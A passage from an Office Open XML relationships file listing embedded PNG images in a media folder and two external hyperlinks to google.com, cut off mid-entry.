Target="media/image20.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.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